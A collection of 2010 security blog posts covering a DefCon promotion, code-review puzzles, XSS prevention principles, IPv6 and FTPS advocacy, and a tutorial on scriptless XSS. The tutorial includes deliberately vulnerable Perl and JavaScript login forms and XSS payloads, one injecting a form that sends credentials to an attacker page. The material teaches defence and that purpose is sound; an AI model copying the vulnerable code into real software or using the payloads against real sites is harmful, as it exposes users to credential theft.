Texas Imperial Software DefCon 18 challenge

I rarely write about my business on the blog here, and perhaps I should do so some more.

I mentioned in the post earlier today how I’d “hacked” my badge (“hacked” in the sense of “that’s not programming, that’s typing”) to display the Texas Imperial Software and WFTPD logos, and the wftpd.com domain hosting our web site.

Also, that I’ll be wearing my bright orange Texas Imperial Software t-shirt.

So, here’s the competition:

Take a photo of the Texas Imperial Software logo, either from my shirt or my badge, and post it to your blog (or other web site), along with a description of where you saw me and a link to Texas Imperial Software’s web site, http://www.wftpd.com. Then send me an email with a link to your site, and when I get back to the office, I’ll email you a free copy of WFTPD Pro – and as long as your page stays there for six months, you’ll get free updates the same as the rest of our customers.

What can you do with the free copy of WFTPD Pro? You can host your own secured FTP server, using the FTP over TLS protocol defined in RFC 4217, and also known as FTPS. Of course, what I’m guessing you’re going to do is hack on it – and that’s OK, providing that you notify me by email before(*) publishing your results. If you turn that hacking into a paper for a con, give me the opportunity to support your presentation, whether that’s with rebuttal, fixes, or mere apologies (sorry, can’t afford money).

The closest thing I have to a catch for this is that it has to be your own unique photo – I’ll be comparing all submissions for similarity, and the best way to avoid duplicates is to have someone else take the photo for you, and put yourself in the picture. And don’t forget, I don’t read your blog, so you have to email me a link to it.

Thanks for participating,


(*) I’d prefer the Google-recommended sixty days to fix stuff, but if you’re the kind of hacker who believes all vendors need public spanking, then by all means post immediately after emailing me. After all, it’s not like you couldn’t do that with the trial version anyway. But if you do that, I’ll be all grumpy about it, and won’t buy you a drink next time I see you.

I’m at DefCon–what’s on your badge?

I’ve been at DefCon 18 for some of Friday – and as with Black Hat, it’s my first time.

I’ve decoded the bar code on the badge, but have no idea what it means (is it the name of Vera’s brother?), and I’ve got a fair idea what the Japanese text is encouraging us to do.

And, just to demonstrate that I can follow simple instructions, you’ll notice that my badge doesn’t look like your badge:


I should add that this isn’t anything particularly clever that I’ve done here, I haven’t solved any riddles or puzzled my way through anything, just managed to read some relatively simple (but somewhat code-ish) instructions. I hope to see many of you with similarly customised badges.

In recognition of the graphics I have on my badge, I’ll be wearing my Texas Imperial Software shirt on Saturday, too.

Here’s an even tighter close-up:


Black Hat Amazon code question part 2

Thanks for the comments so far on the first day’s code question at Black Hat.

I’ll leave it a little while before posting the comments and answers, because it’ll give you a chance to think it through for yourself if you haven’t already done so.

Meanwhile, here’s the code example for day 2. What’s wrong with it?

wchar_t *fillString(
    wchar_t content, unsigned int repeat)
{
    wchar_t *buffer;
    size_t size;
    if (repeat > 0x7fffffffe)
        return 0;
    size = ( repeat + 1 ) * sizeof content;
    buffer = (wchar_t *) malloc ( size );
    if ( buffer == 0 )
        return 0;
    wmemset(buffer, content, repeat);
    buffer[ repeat ] = 0;
    return buffer;
}

The language is C++, and as with the previous example, assume that everything that is not given above is perfect.

In case it is important, this was tested on an x86 system, although the flaw will also show up in x64. We were repeatedly asked that question.

Amazon Black Hat coding question

I’m at Black Hat, hanging out at the Amazon booth with my colleagues, and quite amazed at the stir created by the coding question I put up on the board.

For those of you that haven’t had a chance to see the code, or need more time to figure out what’s wrong, I’m posting the code here. Sadly, no prizes for those of you who aren’t able to come to the booth, and I won’t be accepting posts commenting on the code until after the conference is over.

Consider it a theoretical exercise in code review – how would you handle this Java code arriving in front of you at a code review?

public static boolean isDifferent(
    final MyBean oldBean,
    final MyBean newBean) {
    return
        oldBean != newBean &&
        oldBean != null &&
        !oldBean.equals(newBean);
}
Post your comments, and after the conference is over, I’ll open them up.

For those of you that think in C++ instead of Java (and there were many at the conference), here’s a version in that language:

    static bool isDifferent(
        const someClass const * oldObject,
        const someClass const * newObject) {
        return
            oldObject != newObject &&
            oldObject != NULL &&
            !oldObject->equals(newObject);
    }

There are no ‘cheat’ issues – code not present in the sample is assumed to be perfect.


Simplifying Cross Site Scripting / HTML Injection

Some simple statements about Cross Site Scripting / XSS / HTML Injection (all terms for the same thing):

  • Ignore the term “Cross Site Scripting” as a confusing anachronism. Think “HTML Injection” whenever you hear “Cross Site Scripting”, and you won’t go wrong.
  • The problem of XSS can be summed up quite simply as:
    • XSS allows an outsider to re-write your vulnerable web page(s) before your end users see them.
      • That means any part of the web page can be re-written to do anything your web page could do to the end user
      • That means any attack on your users will be trusted as much as your users trust you
      • That means your users’ credentials, session cookies and other secret information is controlled by an attacker
    • XSS attacks on your users are hard, and in some cases impossible, for you, the server owner, to detect.
    • XSS is easy to prevent, but requires your developers to be aware of, and work to prevent, the problem.
    • The presence of XSS vulnerabilities may void your compliance with regulatory standards such as PCI, SOX, etc.
      • Allowing outsiders to rewrite your web page may mean that you cannot state that you adequately control access to the collection of financially significant data.
      • PCI requires you develop applications with regard to a recognised standard framework, and specifically points to OWASP. OWASP lists XSS and Injection flaws as two of the “top ten” vulnerabilities to prevent. This is as close as PCI gets to outright stating that XSS prevents compliance from being achievable.
  • All XSS attacks have four components:
    • The Injection
      • Where the attacker provides bad data, either directly to the user, or through a ‘store and replay’ mechanism.
    • The Escape (from “text” / “data” to “code”)
      • The escape is optional – but that option is under the control of the page’s author
      • If the page author requires an escape, the attacker cannot attack without correctly escaping
    • The Attack
      • The attack is mandatory – an XSS attack requires an attack component. Duh.
      • However – where an escape is required by the web page, the attack must follow the escape.
      • There are numerous possible attacks – and more being developed daily. You cannot list all possible attack patterns.
    • The Cleanup
      • The cleanup is optional, at the choice of the attacker, and hides from the user the fact that they have been exploited
      • Many attacks use your users’ credentials quickly enough that the cleanup is not required. By the time the user notices (often only a second or so), the attacker has stolen the account, made purchases or read off credit card information.
  • Given this component approach, you as a web page author have limited options:
    • You can’t block the cleanup, because it’s too late at that point – the attack has occurred, and besides, the attacker may not be interested in the cleanup. The cleanup is really only useful in demonstrating that subtle attacks can take place, giving attackers months to clean out a credit card.
    • Blocking the attack is a leaky measure – not that it isn’t worth doing in some cases. For instance, browser protections against XSS often block the attack measure because they don’t control the web site, and can’t reasonably block anything else.
    • Blocking the escape is a guaranteed measure. If attacker-supplied code cannot be viewed by the browser as code, there is no possibility of attack.
    • Blocking the injection is also a guaranteed measure, with two caveats – when you block an injection, you have to make sure that the injection hasn’t already occurred, and that it cannot occur from any other sources.
      • This means that if you block injection of code into, say, a database of message forum posts, you have to scan the existing posts to ensure that the injection hasn’t already taken place.
        • Clean your database when you recognise an injection or attack pattern.
      • Any time there is a database that accumulates information for later display, there will be more than one source vying to put data into the database. If injection is possible in one source, injection is likely from other sources, too.
        • Funnel all sources through one injection filter.
      • Preventing an escape from text into code works whether or not all the injections are blocked.
        • Never rely on injection prevention alone.
  • No matter how innovative attackers get, Cross Site Scripting attacks need not occur.
    • Learn how browsers differentiate between text and code.
    • Use that knowledge to ensure that text remains text, and is never seen as code.
    • Let the browser and your web server platform and libraries help you
      • Use an appropriate document object model function to set text values on fields.
      • Instead of composing HTML in a string to include user supplied text, use a <span> or a <div>, and set its innerText property.
    • Don’t sacrifice safety for speed.
      • Don’t build HTML “on the fly”, either while generating the page or displaying it.
        • InnerHTML is a bad thing to set.
    • Don’t try to “test out” XSS vulnerabilities.
      • You (or your testers) are not Ash Ketchum, and therefore cannot “catch ‘em all”.
    • Develop XSS vulnerabilities out of your application
      • Anything you didn’t specifically write as code, is attacker-supplied untrustworthy data.
      • Prevent injections as much as possible by validating that input is correctly formed.
        • Note that you can’t completely validate all input in all cases.
        • The obvious “bad example” is that of a bug reporting system into which security vulnerability reports are placed. If I have to report an issue with an XSS flaw, I’m going to be deliberately and respectfully pasting XSS attack code into your application. So in that case, you cannot possibly validate my information and remove “invalid” code without removing the valuable part of the text!
        • Validation at the Client is for Convenience only – it allows you to quickly say “that’s not right” and have the user correct it.
        • Only validation at the Server is for Security. Anything you ask the client browser to do on your behalf may be ignored.
      • If you have limited resources, focus on preventing the ability to escape from text into code.
        • Do this by encoding output so that each level of processing can accurately and uniformly distinguish between code and data.
          • This means you must know what each level of processing uses as encoding or escaping of character sequences.
          • This also means you must know how many layers of processing there are between you and the user.
  • If you do ONE THING to prevent XSS on your site, output encoding is the one thing to do.
    • Defence in depth says “never do just one thing”. One thing will one day fail to be implemented properly.
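The output-encoding advice above can be sketched in a few lines. This is an illustrative Python sketch, not code from any particular framework – in practice you should use your platform’s built-in HTML encoder rather than rolling your own:

```python
# Encode the characters that let text escape into HTML code.
# Illustrative only: real applications should use their framework's
# built-in encoder (which handles more contexts than this does).
def html_encode(text):
    return (text.replace("&", "&amp;")   # must be first, or it re-encodes
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("'", "&#39;"))

# Attacker-supplied input stays text, and never becomes code:
payload = '"><script>alert(1)</script>'
print('<input name="username" value="' + html_encode(payload) + '" />')
```

Because every `<`, `>`, quote and ampersand in the user’s data is encoded, the browser can no longer see any of it as markup – blocking the escape, as described above.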

X-Day–less than a year away!


As you can see from the IPv4 Exhaustion Counter to the left (snapshot taken 7/16/2010, 7:30 pm PDT), IPv4 addresses are dwindling.

OK, so that’s perhaps a rather simplistic description of what’s going on – these are a count of the IANA blocks that have not yet been handed out to other providers. Usually what happens is that the IANA hands blocks out to regional network block managers, and they hand them out, piece by piece, to the local providers, who hand them out one (or more for larger organisations) at a time to consumers.

So, even when all these blocks have been handed out (known as “X-Day”), there will still be addresses to be handed out to consumers – but it is a key indicator to follow in realising that IPv4 is a dead-end strategy, and something else needs to be investigated.

What, again?

Yes, we’ve had these calls to move to a new addressing format for years – back in 1993, when I first got on the Internet, there was a lot of discussion about “IPng – Internet Protocol, the Next Generation” (ST:TNG was current then, you must understand).

Later, as IPv6 came along, NATs (Network Address Translators) were brought out as the saviour to IPv4. The idea was that we’d all use the same internal addresses as one another (so each company has their own local 10.* netblock behind the NAT), and a single external IP address for each NAT. To put it mildly, this is not a solution to the problem, it merely postponed it a little – if anything the fact that we have to use NATs is indicative that we have already run out of IPv4 addresses. Until you look into it, you really have no idea how much work we have already put into changing our applications to work with NATs in an effort to prop up IPv4, when we could have spent that time in adopting IPv6.

So we are closer to having to go to IPv6?

Sure – but hey, what’s not to like about IPv6? Unless you’re the developer of a piece of network software, it all just plain works.

Applications accessing file shares by name – can still access file shares over IPv6, without a line of change. Only if you’re dealing specifically with the IP layer and IP addresses will you see a problem. It doesn’t take a lot to turn an app from IPv4-only to IPv6-capable, and users will hardly notice a difference, if you expose names, rather than IP addresses. [It took me two hours to convert the underlying engine of WFTPD and WFTPD Pro to use IPv6. The user interface took/is taking me longer, because I'm not so good at UI, and haven't had the focused time I need. But it’s coming.]
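To illustrate the sort of change involved, here’s a sketch (in Python, for brevity – not the WFTPD code itself) of the family-agnostic connect that most IPv4-to-IPv6 conversions boil down to: resolve by name, then try whatever address families the resolver hands back:

```python
import socket

# Resolve by NAME, then try each returned address in turn -- the resolver
# hands back AF_INET and/or AF_INET6 entries, so the same code works for
# IPv4 and IPv6 without mentioning either.  (Sketch only: no timeouts.)
def connect_by_name(host, port):
    last_err = None
    for family, socktype, proto, _, addr in socket.getaddrinfo(
            host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        s = socket.socket(family, socktype, proto)
        try:
            s.connect(addr)
            return s  # first address that answers wins
        except OSError as err:
            last_err = err
            s.close()
    raise last_err if last_err else OSError("no addresses for " + host)
```

Code written this way never hard-codes an address family – which is exactly why users who deal in names, rather than IP addresses, hardly notice the switch.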

You have to reconfigure your routers a little – they at least need to either act as DHCPv6 sources, or handle DHCPv6 traffic to/through a redirector. Ask your router manufacturer what they recommend. And, since you won’t be using a NAT as an accidental firewall, you’ll want to make sure your routers have real firewall functionality.

Technology leaders should be asking to beta test their ISPs’ IPv6 support, and if your ISP isn’t at least beta testing IPv6 support, get them to catch up, or move to one that does. Good gracious, even laggard Comcast is testing IPv6 for its customers!

Some things to look forward to with IPv6:

  • Multicast supported natively – maybe Internet radio stations will pick up on this and make their live feeds take up less global bandwidth.
  • IPsec supported natively – no excuse any more.
  • Because IP addresses are longer and impossible to remember, names will become more prevalent. That’s a good thing, because it discourages you from thinking of numeric IP addresses as secure, static or necessary to know.
  • Every machine now becomes a "first class citizen" on the Internet. This means FTP, H.264 and other protocols that require transmission of IP addresses within the protocol work again. [That makes IPsec easier and more efficient, too]
  • No more NATs. [Except for the pesky IPv4 <-> IPv6 translation layers] No more kludges to deal with NATs.
  • There are currently a number of services that are either only available on IPv6, or are available for free on IPv6. That will only grow as time goes on.

FTP is Secure; Is Your FTP Server Secure?

Stupid spammer is stupid, spamming me his stupid spam.

As far as I can tell, I have had no interactions with either Biscom or Mark Eaton. And yet, he sends me email every couple of months or so, advertising his company’s product, BDS. I class that as spam, and usually I delete it.

Today, I choose instead to comment on it.

Here’s the text of his email:


Although widely used as a file transfer method, FTP may leave users non-compliant with some federal and state regulatory requirements. Susceptible to hacking and unauthorized access to private information, FTP is being replaced with more secure file transfer technologies. Companies seeking ways to prevent data breaches and keep confidential information private should consider these FTP risks:

» FTP passwords are sent in clear text
» Files transferred with FTP are not encrypted
» Unpatched FTP servers are vulnerable to malicious attacks

Biscom Delivery Server (BDS) is a secure file transfer solution that enables users to safely exchange and transfer large files while maintaining a complete transaction and audit trail. Because BDS balances an organization’s need for security – encrypting files both at rest and in transit – without requiring knowledge workers to change their accustomed business processes and workflows, workers can manage their own secure and large file delivery needs. See how BDS works.

I would request 15 minutes of your time to mutually explore on a conference call if BDS can meet your current and future file transfer requirements. To schedule a time with me, please view my calendar here or call my direct line at 978-367-3536. Thank you for the opportunity and I look forward to a brief call with you to discuss your requirements in more detail.

Best regards,

Better than most spammers, I suppose, in that he spelled my name correctly. That’s about the only correct statement in the entire email, however. It’s easy to read this and to assume that this salesman and his company are deliberately intending to deceive their customers, but I prefer to assume that he is merely misinformed, or chose his words poorly.

In that vein, here’s a couple of corrections I offer (I use “FTP” as shorthand for “the FTP protocol and its standard extensions”):

  • “FTP may leave users non-compliant”
    • I have yet to see a standard that states that FTP is banned outright. While FTP is specifically mentioned in the PCI DSS specification, it is always with language such as “An example of an insecure service, protocol, or port is FTP, which passes user credentials in clear-text.” FTP has not required user credentials to be passed in clear text for over a decade. An FTP server with a requirement that all credentials are protected (using encryption, one-time password, or any of the other methods of securing credentials in FTP) would be accepted by PCI auditors, and by PCI analysis tools.
  • “Susceptible to hacking and unauthorized access to private information”
    • BDS’s suggested replacement, Biscom, relies on the use of email to send a URL, and HTTPS to retrieve files.
    • email is eminently susceptible to hacking, as it is usually sent in the clear (to be fair, there are encryption technologies available for email, but they are seldom used in the kind of environments under discussion)
    • HTTPS is most definitely also susceptible to hacking and unauthorised access.
  • “FTP is being replaced with more secure file transfer technologies”
    • FTP may be replaced, that’s for certain, but I have not seen it replaced with more secure, reliable, or standard file transfer technologies.
      • Biscom essentially puts an operational framework around the downloading of files from a web server. It doesn’t add any security that FTP is lacking.
    • One more secure file transfer technology could be, of course, a more modern FTP server and client, which handles modern definitions of the FTP protocol and its extensions – for instance, the standard for FTP over TLS (and SSL), known as FTPS, which allows for encryption of credential information and file transfers, as well as the use of client and server certificates (as with HTTPS) to mutually authenticate client and server.
      • While the FTPS RFC was finalised only in 2005, it had not changed substantially for several years prior to that. WFTPD Pro included functional and interoperable implementations in versions dating back to 2001.
  • “FTP passwords are sent in clear text”
    • “People walk out into traffic without looking” – equally true, but equally open to misinterpretation. Most people don’t walk out into traffic without looking; most FTP servers are able to refuse clear text logons.
    • FTP passwords are sent in clear text in the most naïve implementations of FTP. This is true. But FTP servers have, for a decade and more, been able to use encryption and authentication technologies such as Kerberos, SSL and TLS, to prevent the transmission of passwords in clear text. If passwords are being sent in clear text by an FTP implementation, that is a configuration issue.
  • “Files transferred with FTP are not encrypted”
    • Again, for a decade and more, FTP servers have encrypted files using Kerberos, SSL or TLS.
    • If your FTP transmission does not encrypt files when it needs to, it is because of faulty configuration.
  • “Unpatched FTP servers are vulnerable to malicious attacks”
    • So are unpatched HTTP servers; so are unpatched email servers and clients; the very technology on which BDS depends.
    • Are unpatched BDS servers invulnerable? I thoroughly doubt that any company could make such a claim.
  • “BDS [operates] without requiring knowledge workers to change their accustomed business processes and workflows”
    • … unless your accustomed business process is to use your FTP server as a secure and appropriate place in which to exchange files.

Finally, some things that BDS can’t, or doesn’t appear to, do, but which are handled with ease by FTP servers. (All of these are based on the “How BDS works” page. As such, my understanding is limited, too, but then I am clear in that, and not claiming to be a renowned expert in their protocol. All I can do is go from their freely available material. FTP, by contrast, is a fully documented standard protocol.)

  • Accept uploads.
    • The description of “How BDS works” demonstrates only the manual preparation of a file and sending it to a recipient.
    • To allow two-way transfers, it appears that BDS would require each end host their own BDS server. FTP requires only one FTP server, for upload and/or download. Each party could maintain FTP servers, but it isn’t required.
  • Automated, or bulk transfers.
    • Again, the description of “How BDS works” shows emailing a recipient for each file. Are you going to want to do that for a dozen files? Sure, you could zip them up, but the option of downloading an entire directory, or selected files chosen by the recipient, seems to be one you shouldn’t ignore.
    • If your recipients need to transfer files that are continually being added to, do you want them to simply log on to an established account, and fetch those files (securely)? In the BDS model, that does not appear to be possible.
  • Transfer from regular folders.
    • BDS requires that you place the files to be fetched on a specialised server.
    • FTP servers access regular files from regular folders. If encryption is required, those folders and files can be encrypted using standard and well-known folder and file-level encryption, such as the Encrypting File System (EFS) supplied for free in Windows, or other solutions for other platforms.
  • Reduce transmission overhead
    • FTP transmissions are slightly smaller than their equivalent HTTP transmissions, and the same is true of FTPS compared to HTTPS.
    • When you add in the email roundtrip that’s involved, and the human overhead in preparing the file for transmission, that’s a lot of time and effort that could be spent in just transferring the file.
  • Integration with existing identity and authorisation management technology.
    • Where FTP relies on using operating system authentication and access control methods, you can use exactly the same methods to control access as you do for controlling access to regular files. It does not seem as though BDS is tied into the operating system in the same way.
    • [FTP also usually offers the ability to manage authentication and access control separately from the operating system, should you need to do so]
  • Shared files
    • If your files need to be shared between a hundred known recipients, BDS appears to require you to create one download for each file, for each recipient. That’s a lot of overhead.
    • FTP, by comparison, requires you to place the files into a single location that all these users can access. Then send an email to the users (you probably use a distribution list) telling them to go fetch the file.
    • Similarly, you can use your own FTP server to host a secure shared file folder for several of your customers. BDS does not offer that feature.

So, all things told, I think that Biscom’s spam was not only unsolicited and unwanted, but it’s also at the very least incorrect and uninformed. The whitepaper they host at http://www.biscomdeliveryserver.com/collateral/wp/BDS-wp-aberdeen-200809.pdf repeats many of these incorrect statements, attributing them to Carol Baroudi of “The Aberdeen Group”. What they don’t link to is a later paper from The Aberdeen Group’s Vice President, Derek Brink, which is tagged as relating to FTPS and FTP – hopefully this means that Derek Brink is a little better informed, possibly as an indirect result of having Ipswitch as one of the paper’s sponsors. I’d love to read the paper, but at $400, it’s a little steep for a mere blog post.

So, if you’ve been using FTP, and want to move to a more secure file transfer method, don’t bother with the suggestions of a poorly-informed spammer. Simply update your FTP infrastructure if necessary, to a more modern and secure version – then configure it to require SSL / TLS encryption (the FTP over Kerberos implementation documented in RFC 2228, while secure, can have reliability issues), and to require encrypted authentication.

You are then at a stage where you have good quality encrypted and protected file transfer services, often at little or no cost on top of your existing FTP infrastructure, and without having to learn and use a new protocol.
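As an illustration of how little client-side code such a setup demands, here’s a sketch using Python’s standard ftplib – the host name and credentials are placeholders, not a real server:

```python
from ftplib import FTP_TLS

# Explicit FTP over TLS, as defined in RFC 4217: AUTH TLS protects the
# credentials, and PROT P encrypts the data channel as well.
# The host, user and password arguments are placeholders.
def secure_listing(host, user, password):
    ftps = FTP_TLS(host)
    ftps.login(user, password)  # credentials now travel inside TLS
    ftps.prot_p()               # encrypt file and directory transfers too
    files = ftps.nlst()
    ftps.quit()
    return files
```

The same standard clients and servers that speak plain FTP speak this, too – no new protocol to learn.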

Doubtless there are some features of BDS that make it a winning solution for some companies, but I don’t feel comfortable remaining silent while knowing that it’s being advertised by comparing it ineptly and incorrectly to my chosen favourite secure file transport mechanism.

Cross-Site Scripting (XSS) – no script required

I’m going to give away a secret that I’ve successfully used at every interview I’ve had for a security position.

“Cross-Site Scripting” (XSS) is a remarkably poor term for the attack, and the vulnerability, that it describes. The correct term should be “HTML Injection”, because it succinctly explains the source of the problem, and should provide developers with pretty much all the information they need to recognise, avoid, prevent, and address the vulnerabilities that lead to these attacks being possible. Here’s what’s wrong with the original term:

  1. It doesn’t abbreviate well – the accepted abbreviation is XSS, because CSS was taken by “Cascading Style Sheets”
  2. Nobody seems to be able to explain, definitively and without the possibility of being contradicted by someone else’s explanation, whether “Cross Site” means “intra site”, “inter site”, both or neither. Certainly there are examples of attacks which use one XSS-vulnerable page only to exploit a user.
  3. As you will see from the remainder of this post, no actual script is required at all, either on the browser, or on the server. So, disabling script in the browser, or running a tool such as noscript that essentially does the same thing for you, is not a complete solution.
  4. HTML Injection can include injecting ActiveX, Flash, Java, or JavaScript objects into an HTML page.

[Note that I am not suggesting that prior work into XSS protections is bad, just that it is not complete if it focuses on JavaScript / ECMAScript / whatever you want to call it.]

Failure to understand XSS has led to people assuming that they can protect themselves by simple measures – disabling JavaScript, filtering “<script>” tags, “javascript:” URLs, and so on. Such approaches have uniformly failed to work, in much the same way as other “black-list” methods of defeating attacks on security flaws – it pretty much dares the attacker to find a way to exploit the bug using something else.

Particularly galling is when I look at code whose developers had heard about XSS, had looked about for solutions, and had found a half-baked solution that made them feel better about their code, made the bug report go from “reproducible” to “cannot reproduce”, but left them open to an attacker with a little more ingenuity (or simply a more exhaustive source of sample attacks) than they had. It seems that developers often try, but are limited by the resources they find on the Intarweb – particularly blogs seem to provide poor solutions (ironic, I know, that I am complaining about this in my blog).
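To see why such half-baked fixes fail, consider a toy “strip the script tags” filter – a Python sketch of the black-list approach described above, together with two standard ways around it:

```python
import re

# A naive black-list filter of the kind the post warns about: it strips
# anything that looks like a <script> or </script> tag.
def naive_filter(html):
    return re.sub(r'(?i)<\s*/?\s*script[^>]*>', '', html)

# Bypass 1: no script element at all -- an event handler attribute will do.
bypass1 = '<img src=x onerror=alert(1)>'

# Bypass 2: nest the tag so that removing the inner copy
# stitches the outer one back together.
bypass2 = '<scr<script>ipt>alert(1)</scr</script>ipt>'

print(naive_filter(bypass1))  # unchanged: the filter never fires
print(naive_filter(bypass2))  # the filtering itself rebuilds the script tag
```

The filter takes the bug report from “reproducible” to “cannot reproduce”, while leaving both attacks wide open – which is exactly the trap described above.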

I know all this – give me something new.

Alright then, here’s something that appears to be new to many – a demonstration of Cross-Site Scripting without scripting.

We all know how XSS happens, right? A programmer wants to let the user put some information on the page. Let’s say he wants to warn the user that his password was entered incorrectly, or his logon session has expired. So, he needs to ask the user to enter username and password again, but probably wants to save time by putting the user’s name in place for the user, to save on typing.

Here’s what the form looks like – you’ve all seen it before:


The code for this form is simple, mostly to make the example easy. I’ll write it in Perl and Javascript – because the Perl version is exploitable everywhere, and because the Javascript version demonstrates how DOM-based XSS attacks work (and how browser strangeness can cause them to be flakey).

[Note: A DOM-based attack, for those that don’t know, is an attack that uses Javascript to modify the HTML page while it is at the browser’s side. These are difficult to detect, but generally result from the use of unsafe functionality such as the innerHTML property.]

Needless to say – don’t use these as examples of good code – these are EXAMPLES of VULNERABLE CODE. And lousy code at that.


use CGI;
my $query = new CGI;
print $query->header;
print $query->h1("Session timed out."),
    $query->p("You have been logged out from the site - please enter your username and password to log back in."),
    $query->start_form(-action=>"happyPage.htm", -method=>"get"),
    # Vulnerable line: the username parameter is echoed with no encoding at all.
    "Username: <input name=\"username\" value=\"" . $query->param("username") . "\" />", $query->br(),
    "Password: ", $query->password_field(-name=>"password"), $query->br(),
    $query->submit(),
    $query->end_form();


<h1>Session timed out.</h1>
<p >You have been logged out from the site - please enter your username and password to log back in.</p>
<form id="safeForm" action="happyPage.htm" method="get">
  Username: <input name="username" value="name placeholder" /><br />
  Password: <input name="password" type="password" /><br />
  <input type="submit" />
</form>

<script type="text/javascript">
    var queries;
    function getQueryString(key) {
        if (queries == undefined) {
            queries = {};
            var s = window.location.href.replace(/[^?]+\?/, "").split("&");
            for (var x in s) {
                var v = s[x].split("=");
                if (v.length == 2)
                    queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
            }
        }
        if (key in queries)
            return queries[key];
        return "";
    }

    var myField = document.getElementById("safeForm");

    if (myField != null) {
        var un = getQueryString("username");

        // Build the form with the username passed in. This is the
        // vulnerable step: "un" is attacker-controlled and goes
        // straight into innerHTML without encoding.
        myField.innerHTML = myField.innerHTML.replace(/name placeholder/, un);
    }
</script>


Side Note – on DOM-based XSS and anchors

Now, why did I specifically include the “getQueryString” in my Javascript version above? I could have simply said “assume this function exists with ordinary behaviour”. Well, I chose that one (downloaded from, naturally, a blog advising how to do this properly) because it processes the entire href, anchor and all.

If we modify our URL by adding “#&” between the query and the variable “username”, it demonstrates one of the more frightening aspects of DOM-based attacks. Those of you who are aware of what an anchor does to a browser will already have figured it out, but here’s a quick explanation.

The “anchor” is considered to be everything after the “#” in a URL. Although it looks like it’s part of the query string, it’s not. Browsers don’t send the “#” or anything after it to the server when requesting a web page, so it’s not seen in a network trace, and it’s not seen in the server logs. This means that DOM-based attacks can hide all manner of nastiness in the anchor, and your scanners won’t pick it up at all.
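To see the anchor trick in action outside a browser, here is a sketch of the same parsing logic with the href passed in as a parameter (the function name parseQuery is mine, not from the page above):

```javascript
// Mirrors the page's getQueryString logic, but takes the href as an
// argument so the behaviour is easy to inspect.
function parseQuery(href, key) {
    var queries = {};
    // Strip everything up to and including the first "?" - note that
    // this keeps the anchor, because the regex only looks for the "?".
    var s = href.replace(/[^?]+\?/, "").split("&");
    for (var x in s) {
        var v = s[x].split("=");
        if (v.length == 2)
            queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
    }
    return (key in queries) ? queries[key] : "";
}

// The "#&username=evil" fragment never reaches the server, but the
// parser reads it as just another query-string parameter.
console.log(parseQuery("http://example.com/page?real=1#&username=evil", "username"));
// evil
```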

Back to the scriptless XSS…

So, this page would normally get executed with a parameter, “username” which would be the username whose account we’re asking for credentials for – and certainly it works with http://localhost/XSSFile.htm?username=Fred@example.com :


The trouble is, it also works with the XSS attackers’ favourite test example, http://localhost/XSSFile.htm?username="><script>alert("XSS")%3b</script> :


Now, I’ve seen developers who are given this demonstration that their page is subject to an XSS attack. What do they do? They block the attack. Note that this is not the same as removing or fixing the vulnerability. What these guys will do is block angle brackets, or the tag “<script>”. As a security guy, this makes me sigh with frustration, because we try to drill it into people’s heads, over and over and over again, that blacklisting just doesn’t work, and that “making the repro go away” is not equivalent to “fixing the problem demonstrated by the repro”.
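For contrast, the non-blacklist fix is to encode user-supplied data for the HTML context it lands in. A minimal sketch (my addition, not part of the vulnerable examples above):

```javascript
// Encode the five characters that matter in an HTML attribute or text
// context, instead of trying to enumerate "bad" input.
function htmlEncode(s) {
    return s.replace(/&/g, "&amp;")   // must come first, or we double-encode
            .replace(/</g, "&lt;")
            .replace(/>/g, "&gt;")
            .replace(/"/g, "&quot;")
            .replace(/'/g, "&#39;");
}

console.log(htmlEncode('"><script>alert("XSS");</script>'));
// &quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;
```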

The classic attacker’s response to this is to go to http://ha.ckers.org/xss.html for the XSS Cheat Sheet, and pull something interesting from there. Maybe use the list of events, say, to decide that you could set the ‘onfocus’ handler to execute your interesting code.

But no, let’s suppose by some miracle of engineering and voodoo the defender has managed to block all incoming scripts. Even so, we’re still vulnerable to XSS.
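To make the point concrete, here is a sketch of the kind of blacklist filter I mean, and a scriptless payload that sails straight through it (“badpage.example” is a stand-in for an attacker’s server, not a URL from the original demonstration):

```javascript
// A hypothetical blacklist filter: strips <script> tags and
// javascript: URLs, and nothing else.
function naiveFilter(input) {
    return input
        .replace(/<\s*\/?\s*script[^>]*>/gi, "")
        .replace(/javascript\s*:/gi, "");
}

// A scriptless payload: close the value attribute and the original
// form, then open a new form pointing at the attacker's server.
var payload = '"></form><form action="http://badpage.example/">' +
              '<input name="username';

console.log(naiveFilter(payload) === payload);
// true - the filter changes nothing
```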

What happens if we try this link:


[The “%3d” there is a hex value representing the “=” character so that the query-string parser doesn’t split our attack.]


OK, that’s kind of ugly – but it demonstrates that you can use an XSS vulnerability to inject any HTML – including a new <form> tag, with a different destination – “badpage” in our URL above, but it could be anywhere. And by hiding the attacked input field, we can engineer the user into thinking it’s just a display issue.
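Here is a rough simulation, runnable outside the browser, of what the username portion of the page’s markup becomes after such an injection (again, “badpage.example” is a stand-in):

```javascript
// The fragment of the page that the DOM-based version rewrites.
var template = 'Username: <input name="username" value="name placeholder" />';

// Close the value attribute (hiding the original field as we go),
// close the real form, and open a new one aimed at the attacker.
var payload = '" style="display:none" /></form>' +
              '<form action="http://badpage.example/">' +
              '<input name="username" value="';

// This is exactly the replace the vulnerable page performs.
var result = template.replace(/name placeholder/, payload);
console.log(result);
```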

With some jiggery-pokery, we can get to this:


Looks much better (and with more work, we could get it looking just right):


So, there you have a demonstration of scriptless cross-site scripting. XSS, or HTML Injection, as I’d prefer you think of it, can inject any tag(s) into your page – can essentially rewrite your page without your knowledge. If you want to explain the magnitude of XSS, it is simply this – an attacker has found a way to rewrite your web page, as if he was employed by you.

[Of course, if I hadn’t been trying to demonstrate that XSS is a misnomer, and prove that you can shove any old HTML into it, I would simply have used a piece of script, probably on the onmouseover event, to set the action of the form to post to my bad site. Fewer characters. Doing so is left as an exercise for the reader.]

Side discussion – why does the Javascript version work at all?

It doesn’t work in Internet Explorer, but in other browsers, it seems to work just fine. At first look, this would seem to suggest that “innerHTML” on a <form> tag is allowing the “</form>” in the XSS to escape out from the parent form. I can assure you that’s not the case, because if you could escape out, that would be a security flaw in the browsers’ implementation of innerHTML. So, what’s it doing, and how do you find out?